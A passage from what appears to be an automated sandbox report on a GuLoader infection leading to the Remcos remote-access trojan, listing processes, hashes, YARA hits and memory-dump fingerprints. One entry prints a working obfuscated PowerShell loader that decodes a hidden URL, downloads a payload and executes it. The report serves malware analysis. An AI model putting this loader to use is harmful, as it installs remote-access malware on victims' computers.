Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2406245717.0000018221C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 3
Start time: 01:52:10
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 01:52:20
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
                                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sarcosome; function Relationsdatabasemodellen($Omgngelsernes){$Skinfulndustrivirksomheden=4;$Skinful=$Skinfulndustrivirksomheden;do{$Klasselotteriets+=$Omgngelsernes[$Skinful];$Skinful+=5} until(!$Omgngelsernes[$Skinful])$Klasselotteriets}function Woodranger($Henequen){ .($Ludgate) ($Henequen)}$Akvavitters3=Relationsdatabasemodellen 'Vif nS miernketBrid. SliW';$Akvavitters3+=Relationsdatabasemodellen 'Styre OveB dspc.eneL SynICaboEAstinConvt';$grounds=Relationsdatabasemodellen 'Sh,mMsammo ,dhz enbiMindl elpltidsa N,n/';$Komitadji=Relationsdatabasemodellen 'KlebT LowlEft sBrie1Albu2';$Parodi='P al[ oseNcapeeEkspTVild.G.noSBoulELic.RTilbvAmasi Sa.cWindeNon,PGenno BariArchnLi nTTinkmLit.akol N BedaSnekgOrchEB,virLina]Rgni:Fors:SupesInfeERorpcT lsUsp nRVen ivurdt unlyLokaP H lrGastOIndht G nOSti cOpdrOStanLC ha=Gibb$ M rkSlarO Liqm surIPo,tTRe,sAPrehdLa.tJRednI';$grounds+=Relationsdatabasemodellen 'Thr.5Logg.,egl0Ung D,se( RekWBasiiSkrinPremd AlloFasewT lbs win Re mN SveThjem Feri1Denu0swit.meda0Di p;Vand ArpW SeliDiskn ,vi6Inst4Efte;P.os Tocxdobb6 Unp4augu; S,o Or fr Pasvluna:Pa,c1Bldt3Hjer1H mr.Cont0Arch)Fire KnacGFlokeCom cAntik taloDose/Sy p2Inde0Varm1Unde0eigh0Apes1Hexa0Foot1Sacc PrefF PutiDi prClume Kv fStado pylxChil/Fjer1Germ3Unti1Slad.Locu0';$Sinecurist=Relationsdatabasemodellen 'Hemmu M,nsTurkEBio r Per-RetrAT.trgFluoEAn,iNUbnht';$statsretten=Relationsdatabasemodellen 'SpathHjadt pstt AerpskolsUdbo: Fin/ Myt/M veoBetofTurr1Ch oxK ll.GodpiUnjucjouruconr/GoblpSyndnT.ksTA atC Ep.lVaniIJudejschaBSpir/DepeS dowh ineoDecitMartsUniotAnhoaRetrrV nd.Achep Tits ,osd';$Bentjs=Relationsdatabasemodellen 'vilj>';$Ludgate=Relationsdatabasemodellen 'F eeiKo,bEEnk X';$Anticiperede='Filtercigarets';$Gushy='\Knapmagerens.Stu';Woodranger (Relationsdatabasemodellen 'Hyp $FestgUsynL CowOPhasbEr dA DeplBegy:M niBI.niNLystd orpsUncoLLazyeA 
leTFrejSPibe=Cut.$PjasE uinAlleVAd n:Afsia OliPNavlpO toDJam.aDrjdT derA,ree+T.ea$RenrGBilbUU frS G.khmosey');Woodranger (Relationsdatabasemodellen ' Vil$ Glagh nllDeltoRetrBQuohaBarbLBrn.:ConcMMisaY prASdfilPe.ogPaddiTypecInfr=Ferr$AbiusMarmTSnebaAfruTConcS TekRPlaneHaret port utoe nkNU ie.Depus,nviPOleslPap IHoltTDeal(Exos$Co cB.iogECoornEtt.TSul J SlesItem)');Woodranger (Relationsdatabasemodellen $Parodi);$statsretten=$Myalgic[0];$Pyemesis=(Relationsdatabasemodellen 'Draa$GeckGCo tL garOEf eBFor.AFluil nfa:ReseY Kv oBrugmBioleSkriRPerc=BrugNFif EHalswFors- acOFossBStlgJudvaeNistcCanaTUgen Hov,SDa,ay CansHandTs ineMereM Sce. Nat$,nveAR,inK T.lVDaniaulveVCiseITrkuTC,ndt rygE UndRLavaS Equ3');Woodranger ($Pyemesis);Woodranger (Relationsdatabasemodellen ' omr$Sl pY ,ilos,pem rabeOmplrIrri.Mys HAnace R da JindCouneVentrForvs sek[Duel$UnsuSGaariFordnDok eHjrncprobu Ge.r U riOut,sJobbtGril]Kr,d=Sjl.$IsolgWi.rrConsoStemuDrftnDiphd Stus');$Cricotus=Relationsdatabasemodellen ' Mid$Vi uYChrooLgnemSodeeD cerFedt.AndeDKardoReimwMichnIndslCharoUdb,a M.cdPreoFStudiHeddlUforeHur,(kor $Ta ssIndotTa oa tratHa rsPrinrModeeGstetForitPsykeExu n ack,Virg$TilfD Tn r Comiu.esvOssih.orduIn usoverpSelvlSkygaJylln un.tHus eOvernBog sCata)';$Drivhusplantens=$Bndslets;Woodranger (Relationsdatabasemodellen 'Chic$VerdG RevlBes,o S.sbOpfyaArbelkva,: CypSHidfePolycLseseP,irR ProNRdoveLaboNPerstBear=St.n( GriTWhaueDentSCallTAb s-EksppChelAHormtFog.h Reo Poly$FragDGarrR A rIHoloVLd.gHTranUTil,SProvpRefolCoaba bliNBeacTPatueBrecnIndaSUdsk)');while (!$Secernent) {Woodranger (Relationsdatabasemodellen 'Osvp$F nag WarlAfhooMuskb,leoaOystlJomf:GardGKo.teDagoaf derD emkKleraSj ps Ek sMoraeEnnes Er =Soli$Mortr.fske M,naRailtSmretBracrPhaniS ydbKugluSelst DeliT,kso Fu n') ;Woodranger $Cricotus;Woodranger (Relationsdatabasemodellen ' AriS CictT rkaAp,lRUdbeT Aan-PapeSTommlArite ntE H rPAn h Dep4');Woodranger (Relationsdatabasemodellen 'Se,e$Ag ngfakeLvindOC llb KimADeflL avo:PedaSblodETmmeCDisteEminR sdmN 
None ManNKa,rTSell= Az (SilkTIroneBaggS ritSuff-HorrPKatoaP,detRougHdr l Niv $AnaldUsafrVandiMa aVMin HTindUPre SIndkp,aprlA,uaA C nnPosttAla.eTubeNBasesUdsp)') ;Woodranger (Relationsdatabasemodellen 'cris$Re iGDiceLA.heOGirabOpsaarec LHvir:NondvSureiAd,oCVampTChaiI LanmEm liAntis fskI LacNKareGSche= er$CinegDespLSuspo ,aiB.pkkaBr.dlTi l:RustoJoosP.pans arntPrinOOptadPate+univ+Spio%Poly$MeanM upYThoraT lelIndbgIndiiPeruCPoor.HorrcAnnao ,ebuS rmnMel T') ;$statsretten=$Myalgic[$Victimising]}$Toxihemia=285000;$Houbara186=31460;Woodranger (Relationsdatabasemodellen ' Fej$CompgAfsvlLoggOAdytBSognaAntilR tc:Ps kIH ptn OveqProdUSoveiH kkeBolitIn,uUBi idiso ETek s Bol C.an=Koeo VladgB.trEWol.tEnv.- Va.c fo oOmstNSubstlsblER doNled.TSemi Coa$KoffDFyrrrGeneiE aiVAbsohSlaruEng SCrowPG rglI noASkr nIsolT AftePinsnRen s');Woodranger (Relationsdatabasemodellen 'hern$ C.ig G,nlPhagoEmanbBesta EkslS in:FordPPelauS rgiUninsNondtDkstiBacke But U de=g.ep Daa[MoniSO ery Ma s intC raeSt.mmIsle.tintCMitioCocknMirav Oble sacr Bekt Una]Angr:lay,:FiliFudkarSpilo,kabm amaB KutaRolfsFa te Le 6Hede4,xceS AtmtDialr GeniSphinTotagEnes(S et$FuldIPalenNrreq KanuOr,giDemee BabtC,cauXuhadChtheStansHerb)');Woodranger (Relationsdatabasemodellen 'Cust$GottgUna LSkiloDhy,B ChiaBaarlPale:GeneAChevpNondrUn eaBotoxNonmI,ekoa Rst2Apat2 Unl6Aud. Eent=Hy.r hom[ Fo StabuyBandsChipT SpaeRessm ,ss. AffT SubETe sXfrigtThog. .ubeKostnSpirC BeaoBa kDLivaiBiv n CocGMaha]expe: ,ip:Ad,eApasss.ygecHypoiSiphIBi t.NotegTraneSanst,gnosPerstAfisrStaniDryonOscugEdd (Kosm$ Ud,pHotluSejriGigasAndot unsI,umbeforb)');Woodranger (Relationsdatabasemodellen ' win$Gr sG ublS akOOp.aBunbeA.lanlPatu: U vmAandeE,sitWiseaEfteLLusto.onsPRoa.hAn u=Afhs$ TaraPot,PTalerAutoaudviXCen.i SkoARepr2Glyp2Arki6Klas.Ni esdukau PoobPurpsIntetSilkr SquI FjeNVellgsesa(Sol $EksptBilloBreeXS,seiA alh Gase Gl Mau diDrhaaUnco,Fol $ timhOv.rOS mmuPho.bfodeAForrr bonAOrri1Exa.8 A p6Tilb)');Woodranger $Metaloph;"
Imagebase: 0x2f0000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2613266468.00000000080C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2613657246.000000000BA9B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2599993582.000000000549C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 5
Start time: 01:52:20
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 01:52:43
Start date: 19/12/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0xe40000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.2719001043.0000000000C4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

                                                              Target ID:10
                                                              Start time:01:52:57
                                                              Start date:19/12/2024
                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                              Imagebase:0x380000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 0%, ReversingLabs
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:11
                                                              Start time:01:53:07
                                                              Start date:19/12/2024
                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                              Imagebase:0x380000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:12
                                                              Start time:01:53:16
                                                              Start date:19/12/2024
                                                              Path:C:\ProgramData\Remcos\remcos.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                              Imagebase:0x380000
                                                              File size:59'904 bytes
                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f0af8e68cdb668a204a8e34c7a607bdf066f8054490c0476ea7f4cfaddf2eb99
                                                                • Instruction ID: 4b6a121b4eb5ec222b338977845e951c0ffa3493ea7dd1d9069fd05f4d33f2e0
                                                                • Opcode Fuzzy Hash: f0af8e68cdb668a204a8e34c7a607bdf066f8054490c0476ea7f4cfaddf2eb99
                                                                • Instruction Fuzzy Hash: 45F19370A08A4D4FEFA8DF28D8967E937D1FF55310F04427AE84DC7291DB3899458B81
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f8a16a0d337b6328ad632224607f5697fef9b443d924efb562f5913a0ccfe623
                                                                • Instruction ID: 87f06a0cc7ac6f97306ca5414a224fd75eb07ba2cdc6348b7c2279228c16e0c9
                                                                • Opcode Fuzzy Hash: f8a16a0d337b6328ad632224607f5697fef9b443d924efb562f5913a0ccfe623
                                                                • Instruction Fuzzy Hash: B0E1B330A08A4D8FEFA8DF28C8A57E977D1FB55310F04427ED84DC7295DE78A9458B81
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 719d9ef9685e9985870dc8c9797fb9da6405549276b119de2d6b45e637d7f3cf
                                                                • Instruction ID: 3d49916f09f0e32052b0e38533bc0d9be2f74f7c9c2edaa1dc17d3fdc9420447
                                                                • Opcode Fuzzy Hash: 719d9ef9685e9985870dc8c9797fb9da6405549276b119de2d6b45e637d7f3cf
                                                                • Instruction Fuzzy Hash: 0B227E30A18A5D8FDF98EF58C4A5AE977E1FFA9304F10017AD449D7396CA35E881CB80
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dce7185c8d09f85bcf21d9af4a1fb67761c786601f692ad7756ad05ee2cd8b30
                                                                • Instruction ID: 71a723ad80b7b9e03b5ee6925673fc9b755b6b2db8987b305b7f5d8811885db6
                                                                • Opcode Fuzzy Hash: dce7185c8d09f85bcf21d9af4a1fb67761c786601f692ad7756ad05ee2cd8b30
                                                                • Instruction Fuzzy Hash: 60B1C630A08A4D4FEFA8DF28D8557E93BE1EF55310F04427EE84DC7292CA789945CB82
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53e546f739b52cfc9301162faee75e7286413b12db01409c22037e639a6aeef3
                                                                • Instruction ID: d66966cc2728f1fff46631f364d4cb015cd57d28bd1ee089aeacef0e5929b2c9
                                                                • Opcode Fuzzy Hash: 53e546f739b52cfc9301162faee75e7286413b12db01409c22037e639a6aeef3
                                                                • Instruction Fuzzy Hash: 4951F562B0DB854FE765EA5888A62A8B7E1EF56310F0501BED04DC7193DD2CBC45D782
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 10f976b67f8140d07fc9a25ab77695c1ba08620a2533c77213d19038fab16d41
                                                                • Instruction ID: f4a1b6de374e141db955f7f9d31039705b7b915900b1d4a5fa9892be82306fc7
                                                                • Opcode Fuzzy Hash: 10f976b67f8140d07fc9a25ab77695c1ba08620a2533c77213d19038fab16d41
                                                                • Instruction Fuzzy Hash: 79314030A1856D8EFFB8DF14CCA6BF932A0FF42B15F400539D50DC6292CA3C6985DA11
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84daf245385b7ba79283bcb0d9b1c76234ef89c6ff894a56ef51a08c5978b53f
                                                                • Instruction ID: c64930a82bc407eab8ced4b473781931f3060f545fc984bc31813030c4cb7773
                                                                • Opcode Fuzzy Hash: 84daf245385b7ba79283bcb0d9b1c76234ef89c6ff894a56ef51a08c5978b53f
                                                                • Instruction Fuzzy Hash: 2221B372F0DB4A4BF7A9A66C54E527572D2EF86250B4800BAE14CC3193DD2DFC099381
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb52f0713a782040a8a5b733cd0a851ddd3339a7141601545c357ff1a254c8a7
                                                                • Instruction ID: e527ae5fbe4793e16cf2e83ad989d5587d9cc1e1f841ef4fd6cd232e20630cf8
                                                                • Opcode Fuzzy Hash: fb52f0713a782040a8a5b733cd0a851ddd3339a7141601545c357ff1a254c8a7
                                                                • Instruction Fuzzy Hash: F6014963F1EA9A4FE7B4AAAC28A52B8B6E1EF5571074801F6E50CD32D3DC0C7C0492C1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b1f2a3fb5816e473b100584740a20a92a24681d053007385ae615d97f0bce4ab
                                                                • Instruction ID: ee42848eff60b601735d4773412060ae9812cb9d135d75ee212a5a430c9806ef
                                                                • Opcode Fuzzy Hash: b1f2a3fb5816e473b100584740a20a92a24681d053007385ae615d97f0bce4ab
                                                                • Instruction Fuzzy Hash: DE11087260D7C44FE7168F68A8626A07FB0EF43230B0801EFD0C9CB1E3D11A998AD752
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ab7f0e4f2eca000da6385149aea868f5c5daf12a19827b00dc52fc6463f9bfe
                                                                • Instruction ID: b9e0aaf9bf965b587c22c845905763fadf91ba910a7b9fff9ab4f4c8e8cc8924
                                                                • Opcode Fuzzy Hash: 3ab7f0e4f2eca000da6385149aea868f5c5daf12a19827b00dc52fc6463f9bfe
                                                                • Instruction Fuzzy Hash: 1301A73020CB0C4FDB48EF0CE051AA5B7E0FB95324F10052DE58AC3651DA36E881CB45
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b50de1c5e075fa0808636133d6d4dc1cddb6533937e9090b1b047abf7fce3d91
                                                                • Instruction ID: 95bfa7166fb118b17fbfb56df5ab054a66ef28815dca964f8fba8b5b9e530640
                                                                • Opcode Fuzzy Hash: b50de1c5e075fa0808636133d6d4dc1cddb6533937e9090b1b047abf7fce3d91
                                                                • Instruction Fuzzy Hash: 40F02B33B0CD0D4EE395966C64552F673D2EFC5131B454277C15EC3152ED29E8178240
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9b6c32459647d52704f95d9a049036c4fe351c5dcf3fbacb11c04b1c0a3a3db4
                                                                • Instruction ID: 88b7e3355e64ac3304af44499f9b44b262a376887bcbb9c3086d015101ad54ae
                                                                • Opcode Fuzzy Hash: 9b6c32459647d52704f95d9a049036c4fe351c5dcf3fbacb11c04b1c0a3a3db4
                                                                • Instruction Fuzzy Hash: 37E0D873B0DB050DFB58995C68621F9B3D1DF82120754047FD24EC2043DC1EB8228280
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a1a9861849f9f0fe1fc262732bab6eefb124e3c4c0560a2bb7b337cda1d2e133
                                                                • Instruction ID: 72b308793116d7265cbebece72a75c5dfcdeebd96f976ead54f094f811e83036
                                                                • Opcode Fuzzy Hash: a1a9861849f9f0fe1fc262732bab6eefb124e3c4c0560a2bb7b337cda1d2e133
                                                                • Instruction Fuzzy Hash: E4E0923270DD894FDF95EA5C94D19A477E0EF6932030401AAE40DC7197DD1DEC94C781
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415758679.00007FFD34710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34710000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34710000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed1cdbe68cd323768d4443f8c1390e6271ae76bfce8cd71f851b0308ecc3daf4
                                                                • Instruction ID: e35a133f29c0fba5be8949240cc53dfa45d6653c513e85d2b479747cf0484c0f
                                                                • Opcode Fuzzy Hash: ed1cdbe68cd323768d4443f8c1390e6271ae76bfce8cd71f851b0308ecc3daf4
                                                                • Instruction Fuzzy Hash: CDE02253B0EA854FE784667C046916866E1EB9A29031041BBE00DCB1A3DC1C6C088751
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: _
                                                                • API String ID: 0-701932520
                                                                • Opcode ID: 732f55f75ba2f5c0ff1b91d0f21e9a6a14d176a7a82144a38b9a3ce2075cf736
                                                                • Instruction ID: c41e0527308e781b67abc1bc2562b02675315ed1a872de369b0470dd09d0ca89
                                                                • Opcode Fuzzy Hash: 732f55f75ba2f5c0ff1b91d0f21e9a6a14d176a7a82144a38b9a3ce2075cf736
                                                                • Instruction Fuzzy Hash: 9B229827B0D6B25EE7125F6CA8B51F93F60DF93225B1A00B3C3C8CE293D91C654A9791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: O_^
                                                                • API String ID: 0-2524604163
                                                                • Opcode ID: dc535516415786d90d0b9c1188ba1869c119be908f0b5e0da1b03c49dbcc8551
                                                                • Instruction ID: baaebf9e0c1ed3410b6041f204ae372894053754007a5e5b9e28b651b3b60ce3
                                                                • Opcode Fuzzy Hash: dc535516415786d90d0b9c1188ba1869c119be908f0b5e0da1b03c49dbcc8551
                                                                • Instruction Fuzzy Hash: B351BD26B0D7D39EE6065B3858B21E53FA1EFA322470901B7C2D4CE1F3EA186946D761
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2415286566.00007FFD34640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ffd34640000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ebefe0a0098d854328ecfb021f8edc4eeb0c7d9f369b4050b54de0f295d86dcb
                                                                • Instruction ID: 2ade685c6c0bab60c8aebd27bec9945e12152484e8f1321fc31c0d99d7f11be1
                                                                • Opcode Fuzzy Hash: ebefe0a0098d854328ecfb021f8edc4eeb0c7d9f369b4050b54de0f295d86dcb
                                                                • Instruction Fuzzy Hash: 0A61B263F0E7D21FE7570A3818750E93FA1AF93224B4A11F7C5D88E2E3D9099446A751
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \V(m
                                                                • API String ID: 0-2800782923
                                                                • Opcode ID: f6190c43954d8e93de673edb5e92b6f477598a6dac32b838b4c44209e6520866
                                                                • Instruction ID: 975972ace091a75ba70c7700ba6140eefc4743f117a91ba9170d2784c4487001
                                                                • Opcode Fuzzy Hash: f6190c43954d8e93de673edb5e92b6f477598a6dac32b838b4c44209e6520866
                                                                • Instruction Fuzzy Hash: E3B15B70E40219CFDF11DFA9C8857AEBBF2BF88714F148129E815A7294EB749845CF85
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ac35152f2b8d6bdba2892c4bc376f460e29a9a35b8722e99ec885ba3df61824
                                                                • Instruction ID: 3439b6e2a1452805985efc0f93b6b14acbaf83cefc80967776dd26615f4fc5e9
                                                                • Opcode Fuzzy Hash: 1ac35152f2b8d6bdba2892c4bc376f460e29a9a35b8722e99ec885ba3df61824
                                                                • Instruction Fuzzy Hash: 9BB18E70E402198FDB10DFA9C88579EBBF2BF88314F548129D815E7694EB749841CF82
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2582668334.0000000002780000.00000040.00000800.00020000.00000000.sdmp, Offset: 02780000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_2780000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 15eb156b238bd7b56a29c6258029e9a35ade3264a89260096f5117955568e871
                                                                • Instruction ID: 87d05f14c8def0f2674156b2b42399c69141497c0e9abdaabd63187752b3fd79
                                                                • Opcode Fuzzy Hash: 15eb156b238bd7b56a29c6258029e9a35ade3264a89260096f5117955568e871
                                                                • Instruction Fuzzy Hash: 0F417C31B40200DFD718EBA4D958ABE7BB6EF89350F195468E506EB7A1CB359C41CB50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.2608511495.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_6ef0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
